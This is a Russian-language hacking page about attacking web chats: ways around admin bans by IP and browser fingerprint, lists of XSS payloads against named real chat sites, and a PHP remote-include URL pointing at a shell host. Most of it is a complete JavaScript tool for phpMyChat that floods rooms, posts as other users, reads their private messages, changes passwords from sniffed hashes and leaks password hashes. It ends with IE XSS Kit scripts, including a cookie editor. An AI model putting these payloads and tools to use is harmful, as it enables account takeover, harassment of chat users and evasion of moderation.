special

Чаты, Уязвимости. Коды. Флуд

Обход Бана

Во многих чатах, Админ может вас забанить по нескольким параметрам:
-по нику -по мылу -по IP-адресу -по Comp_ID Первые два пункта обходятся сменой ника и мыла.


Обход бана по IP-адресу.

1) Выйдите из чата. 2) Удалите cookies для данного чата. Закройте окно браузера. 3) Измените IP, используя прокси. 1.я думаю с первым пунктом все справятся... 2.в браузере(Internet Explorer) нажмите Сервис -> Свойства обозревателя -> удалить "Cookies". 3.для прокси используйте A4Proxy,Hide.IP.Platinum.v2.1 (ищите более новые версии) и есть еще програмка, которая меняет ID браузера при "Супер Бане" (Только на форумах FastBB) "АнтиБан"


Обход бана по Comp_ID.

к примеру возьмем Comp_ID: yjQVj1KUZbd45, он состоит из 13 символов(это всегда). 1,2,3,4 символы - это то, что передаётся ява скриптом при входе на страничку сайта, чата, форума и меняются эти символы Этой программой 9,10 символы - это юзер агент! он меняется переходом на другой браузер или сменой в реестре: заходим в реестр (пуск->выполнить->regedit) ищем там этот раздел: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Internet Settings\User Agent\Post PlatformСоздаем в этом разделе строковый параметр с именем "Ultra-pooper post platform" и значением, к примеру, "IEAK". и заходим в браузер! И еще можно эти символы поменять с помощью этой программки RMOSChange 11 и 5,6,7,8 символы - часовой пояс. меняем часовой пояс и всё ок. 12-ый - глубина цвета. меняем глубину цвета в настройках экрана. 13-ый - разрешение экрана. меняем разрешение экрана.


Уязвимости некоторых чатов

------------------------- Vodoo CHAT ---------------------------
Type:[XSS]
Product: Voodoo chat
Author: qBiN
Exploit:
http://site.com/chat/go.php?url=java script:alert(/Tested%20by%20qBiN/);
Решение: фильтровать переменную урл,можно даже проверять её на валидностьс помощью сокетов.
------------------------------
Type:[XSS]
Product: Voodoo chat
Author: qBiN
Exploit:
http://sitename/chat/password_reminder.php?look_for=%3Cscript%3Ealert(/qBiN test/);%3C/script%3E
------------------------------
Type:[PHP Including]
Product: Voodoo chat 1.0RC1b и возможно болие ранние версий.
Источник: xakep.ru
Пример:
http://sitename.com/[ScriptPath]/index.php?file_path=http://SHELLURL.COM?
------------------------------
Type:FLOODER
Product: Voodoo chat
Author: NaX[no]r†
exploit: 
http://www.balartrating.ru/flood.zip
------------------------- ЧАТ БОРОДИНА ---------------------------
Может матерьял немного стар но всёже http://antichat.ru/txt/chat_borodin/Видео лежит здесь http://video.antichat.net/videos/chat_borodin.rarУязвимость нашел: Morph
Автор статьи: Morph
------------------------- NAROD Chat ---------------------------
Type:[XSS]
Product: NAROD Chat
Author: [sL1p]
Exploit: Passive XSS:
http://www.yandex.ru/cgi-bin/customize.pl?yxqs="><script>alert(document.cookie)</script>
------------------------- Уязвимости конкретных чатов ---------------------------
Type:[XSS]
Product: www.bazar.co.ua
Author: max_pain89
Exploit: Passive ХSS:
http://www.bazar.co.ua/?error[]=<script>confirm(/xxx/)</script>
------------------------------
Type:[XSS]
Product: www.sibchat.ru
Author: [sL1p], Kaban
Exploit: Passive ХSS:
http://www.sibchat.ru/gallery.php?sid='><script>alert(document.cookie)</script> http://www.sibchat.ru/card_help.php?sid="><script>alert(document.cookie)</script> http://www.sibchat.ru/register.php?sid="><script>alert(document.cookie)</script>
------------------------------
Type:[XSS]
Product: www.chatinez.zp.ua
Author: [sL1p]
Exploit: Passive XSS:
http://chatinet.zp.ua/winter2005/party/?001=6941337<a>%22%27"><script>alert(document.cookie)</script>
При желании 001 Можно заменить на:
002, 003, 004, 005, 006, 007, 008, 009, 010, 011, 012, 013, 014, 015, 016
------------------------------
Type:[XSS]
Product: www.smchat.ru
Author: [sL1p]
Exploit: Passive XSS:
http://www.smchat.ru/?key="><script>alert(document.cookie)</script>
http://www.smchat.ru/?chatname=&key="><script>alert(document.cookie)</script> 
http://www.smchat.ru/?ontopic=default&login="><script>alert(document.cookie)</script> 
http://www.smchat.ru/?activate=&login="><script>alert(document.cookie)</script>
http://www.smchat.ru/?password1=&login="><script>alert(document.cookie)</script> 
http://www.smchat.ru/?det=default&login="><script>alert(document.cookie)</script> 
http://www.smchat.ru/?count=1000&key="><script>alert(document.cookie)</script> 
http://www.smchat.ru/?email=&key="><script>alert(document.cookie)</script>
------------------------------
Type:[XSS]
Product: www.chat.ru
Author: [sL1p]
Exploit: Passive XSS:
http://www.chat.ru/user/register.html?dop10=default&confemail="><script>alert(document.cookie)</script> 
http://www.chat.ru/user/register.html?anotherpw="><script>alert(document.cookie)</script> 
http://www.chat.ru/user/register.html?city=&name="><script>alert(document.cookie)</script> 
http://www.chat.ru/user/register.html?action=default&username="><script>alert(document.cookie)</script> 
http://www.chat.ru/user/register.html?city=&year="><script>alert(document.cookie)</script>
Комбинируя запросы можно реализовать гораздо больше xss чем в этом списке.
------------------------------ Type:[XSS] Product: www.krovatka.ru Author: [sL1p], blackybr Exploit: Passive XSS: http://klubnichka.krovatka.ru/k?f=45&newwin=1&id2=5816&id=5673xee7kY1Y&c=8"><script>alert(document.cookie)</script> http://klubnichka.krovatka.ru/f/e.cgi?c=6&n="><script>alert(document.cookie)%3B</script> http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn="><script>alert(document.cookie)%3B</script> http://klubnichka.krovatka.ru/sms/xp.cgi?mn="><script>alert(document.cookie)%3B</script>&ch=6&flag=0 http://klubnichka.krovatka.ru/people/pp33.cgi?ch=6&nn=%3Cmeta+http-equiv=%3E%3C/title%3E%20%3Cscript%3Ealert(document.cookie)%3C/script%3E Для примера взят канал klubnichka, изменяя название канала естесственно можно реализовывать xss везде. ------------------------------ Type:[XSS] Product: www.chatcity.ru Author: [sL1p] Код: http://www.ChatID.chatcity.ru/people/pp33.cgi?c=Chat ID&nn="><script>alert(document.cookie)</script> Chat ID заменяем на адрес чата. У всех они в цифровом значении. ------------------------------


Javascript флудер для phpmychat

Как пользоваться:

Адрес чата в <BASE href="/click?http://neuch.ru/chat/">

(Нужно указать путь именно к папке чата, иногда бывает chat\chat\)

Кнопка Остановить флуд для остановки любого вида флуда

Вход от разных ников флудит так:

"user0 входит в комнату"
"user1 входит в комнату"
"user2 входит в комнату"

Вход и флуд от разных ников:
То же самое, только каждый вошедший оставляет одну месагу

Вход:
Просто войти в чат, чтобы можно было флудить от одного юзера
То, что ниже заголовка Отправка сообщений - для флуда от одного юзера

От всех юзеров на IE:
Можно писать от лица всех других кто на IE
Другие полезные функции
Сменить пасс
Хеш со снифера и логин, чтобы войти в профайл, просто так быстрее сменить его пас
(уже не актуально, так как хеш вообще не нужен, чтобы поиметь пользователя)

Чужой приват:
Читать сабж
Отправка скриптов для Мазилы
Для браузера Mozilla, просто там \x3c \x3e не катят, там по особому

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML> <HEAD> <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251"> <META NAME="Author" CONTENT="Advanced Lamer"> <META NAME="Description" CONTENT="Flooder"> <style> td {background-color:#ADD8E6;} th {background-color:#ADD8E6;} </style> <script> var i=0 var j=0; var temp var firstnick function flood() { if (fl==1) { MsgForm.submit() j++; MsgForm.elements[19].value=" "+j; time=Number(document.timeout.elements[0].value) setTimeout("flood()",time) } } function send() { document.MsgForm.elements[14].value=temp document.MsgForm.elements[16].value=document.form0.elements[7].value MsgForm.submit() time=Number(document.timeout.elements[0].value) setTimeout("enterflood(1)",time) } function enterflood(a) { if (fl==1) { temp=firstnick+i i=i+1 document.form0.elements[5].value=temp document.form0.submit() time=Number(document.timeout.elements[0].value) if (a==1) setTimeout("send()",time) else setTimeout("enterflood(0)",time) } } function enterflood0(b) { firstnick=document.form0.elements[5].value enterflood(b) } function infa() { var url_="http://neuch.ru/chat/whois_popup.php3?L=russian&&U="+document.func.elements[1].value inf=window.open(url_) } function allie() { document.MsgForm.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function allie1() { document.MsgForm1.M.value="\\x3cscript\\x3ewindow.parent.window.input.documen t.MsgForm.M.value=\"\/bye Я пошел! Всем пока!\";window.parent.window.input.document.MsgForm.submi t()\\x3c\/script\\x3e\\test" } function clearmsg() { document.MsgForm.M.value="" } function clearmsg1() { document.MsgForm1.M.value="" } function privat() { var url_="http://neuch.ru/chat/messagesL.php3??From=index.php3&L=russian&Ver=H&U="+document.func.elements[3].value+"&R="+document.func.elements[4].value+"&T=1&D=15&N=40&ST=1&NT=1&PWD_Hash=1220be894c466859602499e1ea2172b0&First=1" priv=window.open(url_) } function changepass() { var cp=window.open("","","width=800,height=600","scrollbars=no,resizable=no,toolbar=no,menubar=no,l ocation=no") cp.document.write("<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0 Transitional//EN\">\n<HTML>\n<HEAD>\n<META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=windows-1251\">\n<META NAME=\"Author\" CONTENT=\"Advanced Lamer\">\n<META NAME=\"Description\" CONTENT=\"Flooder\">\n<META NAME=\"Keywords\" CONTENT=\"neuch, flood\">\n<style>\ntd {background-color:#ADD8E6}\n</style>\n") cp.document.write("<script>\n") cp.document.write("function addhidden()\n{\ndocument.forms[0].AUTH_USERNAME.value=document.forms[0].U.value\ndocument.forms[0].submit()\n}\n") cp.document.write("<\/script>\n") cp.document.write("</HEAD>\n<BODY bgcolor=#008B8B>\n") cp.document.write("<FORM ACTION=\"http://neuch.ru/chat/edituser.php3\" METHOD=POST>\n") cp.document.write("<INPUT type=hidden name=FORM_SEND value=1>\n") cp.document.write("<INPUT type=hidden name=AUTH_USERNAME value=\"\">\n") cp.document.write("<INPUT TYPE=hidden NAME=PASSWORD SIZE=20 MAXLENGTH=30 VALUE=\"\">
\n") cp.document.write("<table border=1 bordercolor=blue cellpadding=10 align=center><tr><td>Хеш<td><INPUT type=text size=35 name=AUTH_PASSWORD value=\"\">
\n") cp.document.write("<INPUT TYPE=hidden NAME=L VALUE=russian>\n") cp.document.write("<tr><td>Имя<td><INPUT TYPE=text NAME=U SIZE=25 MAXLENGTH=30 VALUE=\"\">
\n") cp.document.write("<tr><td align=center colspan=2><INPUT TYPE=button NAME=submit_type VALUE=Профайл onclick=addhidden()>\n") cp.document.write("</table>\n") cp.document.write("</FORM>") cp.document.write("</BODY>\n</HTML>") } </script> <TITLE>"Набор скриптов для издевательства над чатом" от Advanced Lamer'а v1.1</TITLE> <BASE href="/click?http://neuch.ru/chat/"> </HEAD> <BODY bgcolor=#008B8B topmargin=0 leftmargin=0> <script> var fl fl=0 </script> <h1 align=center><font size=5 color=yellow face=verdana>Вход в чат</font></h1> <FORM name=form0 ACTION="index.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="Ver" VALUE="L"> <INPUT TYPE="hidden" NAME="Form_Send" VALUE="1"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <table border=1 bordercolor=blue cellpadding=5 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" SIZE=20 MAXLENGTH=20 VALUE="hackme" onchange="java script:i=0;"> <script> firstnick=document.form0.elements[5].value </script> <tr> <td> <font size=5 color=navy face=verdana>Пасс:</font> <td> <INPUT TYPE="password" NAME="PASSWORD" SIZE=20 MAXLENGTH=20> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R0" size=30 value=Общая> <tr> <td> <font size=5 color=navy face=verdana>Общедоступная</font> <td> <INPUT TYPE="text" NAME="R1" size=30> <tr> <td> <font size=5 color=navy face=verdana>Приватная</font> <td> <INPUT TYPE="text" NAME="R2" SIZE=30> <tr> <td align=center rowspan=2> 
<INPUT TYPE="submit" value="Вход"> <td align=center> 
<INPUT TYPE="button" value="Вход и флуд от разных ников" onclick="java script:fl=1;enterflood0(1)"> <tr> <td align=center> 
<INPUT TYPE="button" value="Вход от разных ников" onclick="java script:fl=1;enterflood0(0)"> </table> </FORM> <p> <h1 align=center><font size=5 color=yellow face=verdana>Отправка сообщений</font></h1> <p> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30% align=center> <font size=3 color=navy face=verdana>Таймаут (мс):</font> <td align=center> 
<form name=timeout><input type=text maxlength=8 size=8 value=1000></form> <tr> <td colspan=2 align=center> 
<form name=stop><input type=button value="Остановить флуд" onclick="java script:fl=0;document.form0.elements[5].value=firstnick"></form> </table> <script> var time=Number(document.timeout.elements[0].value) </script> <p> 
<FORM NAME="MsgForm" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Цвет:</font> <td> <input type=text name="C" value=blue> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=80 rows=10>Флуд!!! </textarea> <tr> <th> 
<INPUT TYPE="button" VALUE="Flood" onclick="java script:fl=1;flood()"> 
<font size=2 color=navy face=verdana>Отправлено&nbsp;&nbsp;&nbsp;&nbsp;<input type=text size=4>&nbsp;&nbsp;&nbsp;&nbsp;сообщений</font> <script> MsgForm.elements[19].value=" 0"; </script> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg()> </table> </FORM> <p> 
<h1 align=center><font size=5 color=yellow face=verdana>Другие полезные функции</font></h1> <form name=func> <table border=2 bordercolor=blue cellpadding=20 align=center width=50%> <tr> <td align=center> <input type=button value="Сменить пасс" onclick=changepass()> <tr> <td align=center> <INPUT TYPE=TEXT name=infauser size=20 value="">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <input type=button value="Инфа о пользователе" onclick=infa()> <tr> <td align=center> <font size=3 color=navy face=verdana>Юзер:</font> <input type=text size=20>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <font size=3 color=navy face=verdana>Комната:</font> <input type=text size=20 value="Общая"> 
<input type=button value="Чужой приват" onclick=privat()> </table> </form> <p> 
<h1 align=center><font size=5 color=yellow face=verdana>Отправка скриптов для Мазилы</font></h1> <FORM NAME="MsgForm1" ACTION="handle_inputH.php3" METHOD="POST" TARGET="input_sent"> <INPUT TYPE="hidden" NAME="From" VALUE="index.php3"> <INPUT TYPE="hidden" NAME="Ver" VALUE="H"> <INPUT TYPE="hidden" NAME="L" VALUE="russian"> <INPUT TYPE="hidden" NAME="T" VALUE="1"> <INPUT TYPE="hidden" NAME="D" VALUE="10"> <INPUT TYPE="hidden" NAME="N" VALUE="20"> <INPUT TYPE="hidden" NAME="O" VALUE="1"> <INPUT TYPE="hidden" NAME="ST" VALUE="1"> <INPUT TYPE="hidden" NAME="NT" VALUE="1"> <INPUT TYPE="hidden" NAME="PWD_Hash" VALUE=""> <INPUT TYPE="hidden" NAME="Ign" VALUE=""> <INPUT TYPE="hidden" NAME="M0" VALUE=""> <INPUT TYPE="hidden" NAME="sent" VALUE="0"> <INPUT TYPE="hidden" NAME="MsgTo" VALUE=""> <table border=2 bordercolor=blue cellpadding=10 align=center> <tr> <td width=30%> <font size=5 color=navy face=verdana>Ник:</font> <td> <INPUT TYPE="text" NAME="U" VALUE="hackme"> <tr> <td> <font size=5 color=navy face=verdana>Комната:</font> <td> <INPUT TYPE="text" NAME="R" VALUE="Общая"> <tr> <td> <font size=5 color=navy face=verdana>Сообщение:</font> <td><textarea NAME="M" cols=70 rows=5>>>>>> </textarea> <tr> <td> <font size=5 color=navy face=verdana>Скрипты:</font> <td> <textarea NAME="C" cols=70 rows=10>"> <script> window.parent.window.input.document.MsgForm.M.valu e=window.parent.window.input.document.MsgForm.PWD_ Hash.value;window.parent.window.input.document.MsgForm.submi t() </script> </</textarea>
<tr> <th> 
<INPUT TYPE="button" VALUE="Отправить" onclick="java script:document.MsgForm1.submit()"> <td align=center> <input type=button value="От всех юзеров на IE" onclick=allie1()> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=button value="Очистить" onclick=clearmsg1()> </table> </FORM> <!-- © Advanced Lamer, 2005 --> </BODY> </HTML

Сохраняем в *.htm и пользуемся


IE XSS Kit



Решил вот на досуге рассмотреть набор инструментов для xss, который лежит на сайте античата. Скачать IE xss kit Ещё небольшое предисловие. Запостил я всё это в этот раздел т.к. этот набор поможет в поиске уязвимостей в чате и немного повысит ваши возможности. Сегодня я кратко расскажу про редактор форм:

Form_Select-one2Text

Этот редактор форм позволяет нам превращать фреймы с зашитыми опциями, в собственный полигон для испытаний.

Начнём с самого простого, в большинстве чатов есть выбор цвета который в html виде производится таким образом:

<OPTION selected VALUE="Black" STYLE="color:black">Чёрный </OPTION>В действительности это выглядит вот так:
IPB ImageКак видите есть зашитые цвета, использование других пока что невозможно. 
Теперь мы подводим курсор мышки к фрейму с выбором цвета, 
щёлкаем правой кнопкой и выбираем команду Form_Select-one2Text 
И вот этот фрейм со строгим выбором цвета становится пустым фреймом с возможностью записи туда любого текста. 
(только не всё что вы напишите будет работать). 
Вот как он выглядит после применения Form_Select-one2Text :
IPB ImageТеперь у вас есть возможность ввести любой код цвета, например #FFFFFF. 
Так же эта команда делает многие фреймы свободными для редактирования. 
(Например в одном чате при выборе пола я сделал себе "Кошмарный Гермофродит"). 
Так же можно и напрямую искать xss уязвимости, подставляя этот код в ставшие доступными нам фреймы.
Вот здесь лежат множество кодов, способных вызвать alert и собственно найти xss. 
Теперь вы ознакомлены с редактором форм Form_Select-one2Text


Form_Method2Text, Form_Hidden2Text

Начнём с Form_Method2Text. Сама по себе команда не очень нужна, т.к. она открывает фрейм где написан метод работы со страницей. Самые основные методы это: post и get. Метод post означает что вы вносите свои данные на страницу. Чаще всего он встречается на форумах, гостевых книгах, чатах и т.д. Метод get означает что вы получаете какие либо данные от самой страницы, чаще всего он используется в поисковых системах, этот метод можно встретить почти везде. В общем эта команда ничем не примечательна, но она так же как и остальные даёт доступ к открытому фрейму. И конечно же в некоторых интернет ресурсах если заменить пост или гет на код xss, то яваскрипт успешно выполняется.

Теперь пройдёмся по команде Form_Hidden2Text. Сама по себе эта команда позволяет просмотреть данные которые зашиты в странице (сорцы) и даёт возможность их подкорректировать.

Покажу вам наглядный пример. Тестировал я этот метод на одном из чатов чатсити, когда нужно отправить отчёт об ошибке.

Вот он: http://www.38557.chatcity.ru/bug/?err=IllegalChannel(get_ch)&www.38557.chatcity.ru&
Скрин делать не буду, т.к. зайдёте по ссылке и сами всё увидете. 
Теперь на этой странице используем команду Form_Hidden2Text, 
как видите открываются фреймы с данными пользователя который зашёл на эту страницу. 
(Так же они есть в сорцах) Теперь их можно редактировать, объясню зачем это нужно. 
При отправлении отчёта о ошибке администратору чатсити прийдут как раз те самые данные 
которые стали нам доступными для редактирования. 
Это наводит на мысль, что можно в этот раз остаться анонимным. Вот скрин того что нам открылось:
IPB ImageКак видно можно всё стереть или подставить чужие данные.
И вот это же самое хранится в сорцах:
<input type=hidden name=err value="IllegalChannel(get_ch)"> <input type=hidden name=browser value="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"> <input type=hidden name=addr value="айпи мой:))"> <input type=hidden name=via value=""> <input type=hidden name=referer value="http://www.38557.chatcity.ru/kpobatka"> <input type=hidden name=args value="www.38557.chatcity.ru&">

Но теперь мы всё можем отредактировать и остаться анонимными, написав администрации пару ласковых

Вот и всё, что могут эти две команды.


Form_Target2Text

Само по себе слово target означает цель, и означает это ваше дальнейшее "направление" после какого либо действия. И в данном случае при использовании этой команды у нас так же открывается фрейм доступный для редактирования. Во многих случаях, (если цель не прописана на яваскриптах) при использовании команды вы увидете какую либо ссылку, куда вас отправит после каких либо действий. Это может быть хоть что, нажатие кнопки ОК, Выход, и т.д. В этом то как раз команда Form_Target2Text очень удобна для поиска Xss. Вы можете приписать xss код к ссылке которая уже была, или просто стереть ссылку и прописать xss код.

LocationReplace

При выполнении этой команды, происходит запрос сценария через метод prompt, запрос идёт на какую либо страницу. В общем не буду ходить вокруг да около, эта команда довольно бесполезна при поиске xss, т.к. чтобы вы не написали, любой ваш текст добавится к изначальнуму адресу страницы с которой вы выполнили команду.

Пример:_http://www.ya.ru/
Используем LocationReplace, выпадает окошко, вписываем туда простую конструкцию:

<script>alert(/test/)</script>

Жмём ОК, и нас перебрасывает на: http://www.ya.ru/<script>alert(/test/)</script>

Толку никакого.. Этот способ для тех, кому лень самим прописать в адресной строке код и не более. 
Так же его можно использовать как рефферер.


Все html коды, которыми оперирует набор IE xss kit.


Cookies:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zExpires() { var expires = new Date(); expires.setYear(expires.getYear() + 10); return expires.toUTCString(); } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zCookie = zDocument.cookie; var zNew = zWindow.prompt('New Cookie?', zCookie); if (zNew != null) { var zNewCookie = zWindow.prompt('New Cookie:', '; EXPIRES=' + zExpires() + ';'); if (zNewCookie != null) zDocument.cookie = zNewCookie; } </script>



Action2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zAction) { innerHTML = '<input type="text" id="zAction" value="' + zConvert(action) + '" title="action" onChange="document.forms[' + i + '].action = this.value">' + innerHTML; } } } </script>



Checkbox2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'checkbox') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '" onDblClick="this.outerHTML = \'\'">'; } } } } </script>



EventsOFF:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var ii in zForms[i]) { if (ii.match(/^on/i) && (zForms[i].getAttribute(ii) != null)) { zForms[i].setAttribute(ii, null); } } for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { for (var jj in zForms[i].elements[j]) { if (jj.match(/^on/i) && (zForms[i].elements[j].getAttribute(jj) != null)) { zForms[i].elements[j].setAttribute(jj, null); } } } } </script>



Hidden2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'hidden') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '">'; } } } } </script>



Method2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zMethod) { innerHTML = '<input type="text" id="zMethod" value="' + zConvert(method) + '" title="method" onChange="document.forms[' + i + '].method = this.value">' + innerHTML; } } } </script>



Radio2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'radio') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '" onDblClick="this.outerHTML = \'\'">'; } } } } </script>



Select-One2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { for (var j = 0; j <= zForms[i].elements.length - 1; j ++) { with (zForms[i].elements[j]) { if (type == 'select-one') { outerHTML = '<input type="text" name="' + name + '" id="' + name + '" value="' + zConvert(value) + '" title="' + type + ' / ' + name + '">'; } } } } </script>



Target2Text:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru function zConvert(text) { var text2 = ''; for (var i = 0; i <= text.length - 1; i ++) { if (text.charAt(i) != escape(text.charAt(i))) { text2 += escape(text.charAt(i)).replace(/%/, '&#x') + ';'; } else { text2 += text.charAt(i); } } return text2; } var zWindow = external.menuArguments; var zDocument = zWindow.document; var zForms = zDocument.forms; for (var i = 0; i <= zForms.length - 1; i ++) { with (zForms[i]) { if (!zForms[i].zTarget) { innerHTML = '<input type="text" id="zTarget" value="' + zConvert(target) + '" title="target" onChange="document.forms[' + i + '].target = this.value">' + innerHTML; } } } </script>



LocationReplace:


<script type="text/javascript"> // Created by zFailure // Web-site: http://zfailure.narod.ru var zWindow = external.menuArguments; var zLocation = zWindow.location; var zNewLocation = zWindow.prompt('New Location:', zLocation); if (zNewLocation != null) zLocation.replace(zNewLocation); </script>



Дата створення/оновлення: 25.05.2018

';